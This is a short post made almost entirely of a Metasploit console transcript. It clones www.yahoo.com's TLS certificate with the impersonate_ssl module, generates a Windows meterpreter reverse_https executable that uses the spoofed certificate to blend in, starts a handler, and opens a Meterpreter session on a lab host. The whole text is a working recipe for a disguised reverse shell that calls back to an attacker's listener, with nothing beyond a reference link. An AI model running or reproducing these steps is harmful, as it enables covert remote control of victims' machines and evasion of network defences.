Metasploit - reverse_https

msf auxiliary(impersonate_ssl) > show options 

Module options (auxiliary/gather/impersonate_ssl):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ADD_CN                             no        Add CN to match spoofed site name (e.g. *.example.com)
   CA_CERT                            no        CA Public certificate
   EXPIRATION                         no        Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
   OUT_FORMAT        PEM              yes       Output format (Accepted: DER, PEM)
   PRIVKEY                            no        Sign the cert with your own CA private key
   PRIVKEY_PASSWORD                   no        Password for private key specified in PRIV_KEY (if applicable)
   RHOST                              yes       The target address
   RPORT             443              yes       The target port

msf auxiliary(impersonate_ssl) > set RHOST www.yahoo.com
RHOST => www.yahoo.com
msf auxiliary(impersonate_ssl) > run 

[*] Connecting to www.yahoo.com:443
[*] Copying certificate from www.yahoo.com:443
/C=US/ST=California/L=Sunnyvale/O=Yahoo Inc./OU=Information Technology/CN=www.yahoo.com 
[*] Beginning export of certificate files
[*] Creating looted key/crt/pem files for www.yahoo.com:443
[+] key: /home/notfound/.msf4/loot/20151117022203_default_116.214.12.74_www.yahoo.com_ke_612544.key
[+] crt: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_ce_987985.crt
[+] pem: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
[*] Auxiliary module execution completed

msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf payload(reverse_https) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf payload(reverse_https) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf payload(reverse_https) > set LPORT 8443
LPORT => 8443
msf payload(reverse_https) > generate -t exe -f /tmp/https.exe -p x86
[*] Writing 73802 bytes to /tmp/https.exe...

msf payload(reverse_https) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) > 
[*] 192.168.1.106:1432 (UUID: 0d7dc065ab206136/x86=1/windows=1/2015-11-17T02:28:16Z) Staging Native payload ...
[*] Meterpreter will verify SSL Certificate with SHA1 hash 9ce474cb2ec1122d77e05dc20f89a9c03266dd81
[*] Meterpreter session 1 opened (192.168.1.103:8443 -> 192.168.1.106:1432) at 2015-11-17 02:28:20 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

---

References

http://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation